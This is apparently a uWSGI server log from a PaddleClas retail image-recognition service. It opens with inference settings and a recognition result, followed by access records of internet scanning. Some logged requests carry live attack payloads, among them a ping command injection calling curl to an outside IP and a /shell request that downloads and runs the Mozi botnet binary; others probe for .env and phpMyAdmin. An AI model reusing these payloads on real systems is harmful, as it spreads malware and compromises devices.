== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-30 08:56:49 INFO: DetPostProcess : +2022-01-30 08:56:49 INFO: DetPreProcess : +2022-01-30 08:56:49 INFO: transform_ops : +2022-01-30 08:56:49 INFO: DetResize : +2022-01-30 08:56:49 INFO: interp : 2 +2022-01-30 08:56:49 INFO: keep_ratio : False +2022-01-30 08:56:49 INFO: target_size : [640, 640] +2022-01-30 08:56:49 INFO: DetNormalizeImage : +2022-01-30 08:56:49 INFO: is_scale : True +2022-01-30 08:56:49 INFO: mean : [0.485, 0.456, 0.406] +2022-01-30 08:56:49 INFO: std : [0.229, 0.224, 0.225] +2022-01-30 08:56:49 INFO: DetPermute : +2022-01-30 08:56:49 INFO: Global : +2022-01-30 08:56:49 INFO: batch_size : 1 +2022-01-30 08:56:49 INFO: cpu_num_threads : 1 +2022-01-30 08:56:49 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-30 08:56:49 INFO: enable_benchmark : True +2022-01-30 08:56:49 INFO: enable_mkldnn : True +2022-01-30 08:56:49 INFO: enable_profile : False +2022-01-30 08:56:49 INFO: gpu_mem : 8000 +2022-01-30 08:56:49 INFO: image_shape : [3, 640, 640] +2022-01-30 08:56:49 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-30 08:56:49 INFO: ir_optim : True +2022-01-30 08:56:49 INFO: labe_list : ['foreground'] +2022-01-30 08:56:49 INFO: max_det_results : 5 +2022-01-30 08:56:49 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-30 08:56:49 INFO: rec_nms_thresold : 0.05 +2022-01-30 08:56:49 INFO: threshold : 0.2 +2022-01-30 08:56:49 INFO: use_fp16 : False +2022-01-30 08:56:49 INFO: use_gpu : False +2022-01-30 08:56:49 INFO: use_tensorrt : False +2022-01-30 08:56:49 INFO: IndexProcess : +2022-01-30 08:56:49 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-30 08:56:49 INFO: return_k : 5 +2022-01-30 
08:56:49 INFO: score_thres : 0.5 +2022-01-30 08:56:49 INFO: RecPostProcess : None +2022-01-30 08:56:49 INFO: RecPreProcess : +2022-01-30 08:56:49 INFO: transform_ops : +2022-01-30 08:56:49 INFO: ResizeImage : +2022-01-30 08:56:49 INFO: size : 224 +2022-01-30 08:56:49 INFO: NormalizeImage : +2022-01-30 08:56:49 INFO: mean : [0.485, 0.456, 0.406] +2022-01-30 08:56:49 INFO: order : +2022-01-30 08:56:49 INFO: scale : 0.00392157 +2022-01-30 08:56:49 INFO: std : [0.229, 0.224, 0.225] +2022-01-30 08:56:49 INFO: ToCHWImage : None +Inference: 375.76818466186523 ms per batch image +[{'bbox': [158, 73, 342, 434], 'rec_docs': '小度充电宝', 'rec_scores': 0.65792215}] +{'bbox': [158, 73, 342, 434], 'rec_docs': '小度充电宝', 'rec_scores': 0.65792215} +234 +["{'bbox': [158, 73, 342, 434], 'rec_docs': '小度充电宝', 'rec_scores': 0.65792215}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 19148|app: 0|req: 1/1] 49.79.98.245 () {34 vars in 447 bytes} [Sun Jan 30 08:56:47 2022] POST /reference_client/ => generated 126 bytes in 3187 msecs (HTTP/1.1 200) 5 headers in 158 bytes (2 switches on core 0) +[pid: 19148|app: 0|req: 2/2] 39.103.140.77 () {38 vars in 679 bytes} [Sun Jan 30 09:21:34 2022] GET / => generated 179 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 3/3] 39.103.140.77 () {30 vars in 356 bytes} [Sun Jan 30 09:21:41 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 4/4] 83.97.20.34 () {30 vars in 329 bytes} [Sun Jan 30 10:14:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 5/5] 173.225.110.122 () {34 vars in 800 bytes} [Sun Jan 30 10:16:18 2022] GET /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;curl http://23.94.194.122:22810/hit.php;&ping_count=1&action=Apply&html_view=ping => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 6/6] 83.97.20.34 () {26 vars in 287 bytes} [Sun Jan 30 12:05:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 7/7] 103.203.56.1 () {34 vars in 388 bytes} [Sun Jan 30 13:20:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 8/8] 62.171.132.199 () {40 vars in 672 bytes} [Sun Jan 30 14:54:48 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 9/9] 223.71.167.166 () {34 vars in 459 bytes} [Sun Jan 30 15:25:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 10/10] 83.97.20.34 () {30 vars in 329 bytes} [Sun Jan 30 16:10:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 11/11] 20.119.205.188 () {36 vars in 524 bytes} [Sun Jan 30 16:11:27 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 12/12] 20.119.205.188 () {40 vars in 631 bytes} [Sun Jan 30 16:11:28 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 185.219.52.134 client_port: 33783] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 13/13] 128.14.134.134 () {34 vars in 565 bytes} [Sun Jan 30 17:39:36 2022] GET /Telerik.Web.UI.WebResource.axd?type=rau => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 14/14] 83.97.20.34 () {26 vars in 287 bytes} [Sun Jan 30 18:12:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 
switches on core 0) +[pid: 19148|app: 0|req: 15/15] 185.180.143.8 () {34 vars in 487 bytes} [Sun Jan 30 18:13:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 16/16] 183.136.225.56 () {34 vars in 535 bytes} [Sun Jan 30 18:38:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 17/17] 47.102.104.161 () {34 vars in 432 bytes} [Sun Jan 30 19:36:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 18/18] 107.189.28.51 () {28 vars in 310 bytes} [Sun Jan 30 20:08:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 19/19] 107.189.28.51 () {40 vars in 671 bytes} [Sun Jan 30 20:08:39 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 20/20] 167.94.138.63 () {28 vars in 310 bytes} [Sun Jan 30 20:31:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 1/21] 167.94.138.63 () {34 vars in 442 bytes} [Sun Jan 30 20:31:50 2022] GET / => generated 179 bytes in 236 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 21/22] 1.202.113.123 () {40 vars in 719 bytes} [Sun Jan 30 21:19:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 2/23] 83.97.20.34 () {30 vars in 329 bytes} [Sun Jan 30 21:19:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 22/24] 39.103.151.239 () {22 vars in 235 bytes} [Sun Jan 30 22:05:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 23/25] 39.103.151.239 () {22 vars in 297 bytes} [Sun Jan 30 22:05:17 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 1/26] 39.103.151.239 () {22 vars in 238 bytes} [Sun Jan 30 22:05:23 2022] OPTIONS / => generated 179 bytes in 238 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 24/27] 39.103.151.239 () {22 vars in 239 bytes} [Sun Jan 30 22:05:26 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 25/28] 39.103.151.239 () {40 vars in 485 bytes} [Sun Jan 30 22:05:29 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 26/29] 107.189.28.51 () {28 vars in 310 bytes} [Sun Jan 30 22:56:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 27/30] 107.189.28.51 () {40 vars in 671 bytes} [Sun Jan 30 22:56:40 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 28/31] 128.14.209.162 () {34 vars in 488 bytes} [Sun Jan 30 22:59:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 29/32] 51.254.59.113 () {32 vars in 450 bytes} [Sun Jan 30 23:24:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 30/33] 209.17.96.74 () {30 vars in 409 bytes} [Sun Jan 30 23:43:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 31/34] 178.239.21.164 () {36 vars in 509 bytes} [Mon Jan 31 00:04:00 2022] GET 
///admin/config.php => generated 0 bytes in 14 msecs (HTTP/1.1 302) 9 headers in 341 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 3/35] 178.239.21.164 () {36 vars in 544 bytes} [Mon Jan 31 00:04:00 2022] GET /admin/login/?next=/admin/config.php => generated 2234 bytes in 41 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 32/36] 83.97.20.34 () {26 vars in 286 bytes} [Mon Jan 31 00:37:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 33/37] 47.101.192.18 () {34 vars in 459 bytes} [Mon Jan 31 00:37:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 34/38] 4.17.224.134 () {36 vars in 522 bytes} [Mon Jan 31 00:44:14 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 35/39] 4.17.224.134 () {40 vars in 629 bytes} [Mon Jan 31 00:44:14 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 36/40] 111.7.96.148 () {32 vars in 357 bytes} [Mon Jan 31 00:49:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 4/41] 111.7.100.16 () {46 vars in 781 bytes} [Mon Jan 31 00:49:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 37/42] 111.7.100.16 () {46 vars in 803 bytes} [Mon Jan 31 00:49:45 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 38/43] 154.89.5.81 () {30 vars in 326 bytes} [Mon Jan 31 01:43:12 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 
162.142.125.222 client_port: 7317] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 39/44] 162.142.125.222 () {24 vars in 267 bytes} [Mon Jan 31 03:05:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 40/45] 162.142.125.222 () {30 vars in 401 bytes} [Mon Jan 31 03:05:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 41/46] 62.171.132.199 () {40 vars in 672 bytes} [Mon Jan 31 03:24:37 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 42/47] 83.97.20.34 () {30 vars in 329 bytes} [Mon Jan 31 03:56:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 43/48] 89.248.165.52 () {24 vars in 372 bytes} [Mon Jan 31 04:02:13 2022] CONNECT hotmail-com.olc.protection.outlook.com:25 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 44/49] 64.62.197.2 () {28 vars in 305 bytes} [Mon Jan 31 04:34:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 45/50] 113.53.51.109 () {32 vars in 463 bytes} [Mon Jan 31 04:54:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 46/51] 89.248.165.52 () {24 vars in 300 bytes} [Mon Jan 31 05:02:15 2022] CONNECT 85.206.160.115:80 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 47/52] 123.145.8.166 () {40 vars in 693 bytes} [Mon Jan 31 05:03:39 2022] HEAD http://110.242.68.4/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches 
on core 0) +[pid: 19148|app: 0|req: 48/53] 101.133.224.200 () {32 vars in 504 bytes} [Mon Jan 31 07:03:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 49/54] 27.184.51.96 () {38 vars in 489 bytes} [Mon Jan 31 07:41:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 50/55] 192.241.213.57 () {34 vars in 394 bytes} [Mon Jan 31 08:05:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 51/56] 180.244.136.9 () {32 vars in 463 bytes} [Mon Jan 31 08:18:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 52/57] 136.144.41.117 () {40 vars in 568 bytes} [Mon Jan 31 08:38:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 53/58] 36.106.167.221 () {40 vars in 720 bytes} [Mon Jan 31 08:42:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 54/59] 36.106.167.119 () {40 vars in 687 bytes} [Mon Jan 31 08:42:13 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 55/60] 201.148.166.112 () {32 vars in 466 bytes} [Mon Jan 31 08:45:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 56/61] 173.249.10.27 () {30 vars in 340 bytes} [Mon Jan 31 08:58:19 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 57/62] 173.249.10.27 () {30 vars in 339 bytes} [Mon Jan 31 08:58:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 
158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 58/63] 128.1.248.26 () {34 vars in 486 bytes} [Mon Jan 31 10:09:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 59/64] 83.97.20.34 () {30 vars in 329 bytes} [Mon Jan 31 10:36:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 60/65] 62.171.132.199 () {40 vars in 672 bytes} [Mon Jan 31 10:49:40 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 61/66] 109.237.103.9 () {36 vars in 523 bytes} [Mon Jan 31 11:27:22 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 62/67] 103.203.57.10 () {32 vars in 399 bytes} [Mon Jan 31 12:11:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 63/68] 95.181.161.193 () {36 vars in 524 bytes} [Mon Jan 31 12:20:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 64/69] 95.181.161.193 () {40 vars in 631 bytes} [Mon Jan 31 12:20:52 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 65/70] 83.97.20.34 () {26 vars in 287 bytes} [Mon Jan 31 12:28:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 2/71] 185.180.143.148 () {34 vars in 484 bytes} [Mon Jan 31 13:03:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 66/72] 107.189.28.51 () {28 vars in 310 bytes} [Mon Jan 31 15:40:11 2022] GET / => generated 179 bytes in 2 
msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 67/73] 107.189.28.51 () {40 vars in 671 bytes} [Mon Jan 31 15:40:12 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 5/74] 83.97.20.34 () {30 vars in 329 bytes} [Mon Jan 31 15:42:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 68/75] 46.252.35.8 () {32 vars in 462 bytes} [Mon Jan 31 16:39:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 69/76] 101.132.128.178 () {30 vars in 346 bytes} [Mon Jan 31 17:46:02 2022] GET /pmd/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 70/77] 101.132.128.178 () {30 vars in 360 bytes} [Mon Jan 31 17:46:02 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 71/78] 101.132.128.178 () {30 vars in 360 bytes} [Mon Jan 31 17:46:02 2022] GET /mysqladmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 72/79] 101.132.128.178 () {30 vars in 352 bytes} [Mon Jan 31 17:46:02 2022] GET /sql.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 73/80] 136.144.41.117 () {40 vars in 568 bytes} [Mon Jan 31 17:58:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 74/81] 47.100.127.194 () {34 vars in 604 bytes} [Mon Jan 31 18:19:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 3/82] 47.100.127.194 () {34 vars in 650 bytes} [Mon Jan 31 
18:19:12 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 75/83] 47.100.127.194 () {34 vars in 616 bytes} [Mon Jan 31 18:19:12 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 76/84] 47.100.127.194 () {34 vars in 653 bytes} [Mon Jan 31 18:19:12 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 24 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 77/85] 47.100.127.194 () {36 vars in 713 bytes} [Mon Jan 31 18:19:12 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 78/86] 47.100.127.194 () {36 vars in 715 bytes} [Mon Jan 31 18:19:12 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 79/87] 47.100.127.194 () {36 vars in 745 bytes} [Mon Jan 31 18:19:12 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 80/88] 47.100.127.194 () {36 vars in 725 bytes} [Mon Jan 31 18:19:12 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 81/89] 47.100.127.194 () {36 vars in 743 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 6/90] 47.100.127.194 () {36 vars in 783 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 7/91] 47.100.127.194 () {36 vars in 753 bytes} [Mon Jan 31 
18:19:12 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 8/92] 47.100.127.194 () {36 vars in 749 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 4/93] 47.100.127.194 () {36 vars in 761 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 5/94] 47.100.127.194 () {36 vars in 781 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 6/95] 47.100.127.194 () {36 vars in 745 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 1/96] 47.100.127.194 () {36 vars in 749 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 237 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 82/97] 47.100.127.194 () {36 vars in 715 bytes} [Mon Jan 31 18:19:12 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 83/98] 47.100.127.194 () {36 vars in 715 bytes} [Mon Jan 31 18:19:12 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 84/99] 47.100.127.194 () {36 vars in 699 bytes} [Mon Jan 31 18:19:12 2022] GET /wcm/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 85/100] 83.97.20.34 () {26 vars in 
287 bytes} [Mon Jan 31 18:24:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 86/101] 39.103.165.234 () {22 vars in 235 bytes} [Mon Jan 31 19:17:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 87/102] 39.103.165.234 () {22 vars in 297 bytes} [Mon Jan 31 19:17:56 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 88/103] 39.103.165.234 () {22 vars in 238 bytes} [Mon Jan 31 19:18:01 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 89/104] 39.103.165.234 () {22 vars in 239 bytes} [Mon Jan 31 19:18:04 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 90/105] 39.103.165.234 () {40 vars in 485 bytes} [Mon Jan 31 19:18:07 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 91/106] 119.108.65.35 () {34 vars in 648 bytes} [Mon Jan 31 19:22:51 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.108.65.35:55172/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 92/107] 183.136.225.14 () {30 vars in 414 bytes} [Mon Jan 31 19:24:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 93/108] 183.136.225.14 () {32 vars in 475 bytes} [Mon Jan 31 19:25:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 94/109] 183.136.225.14 () {32 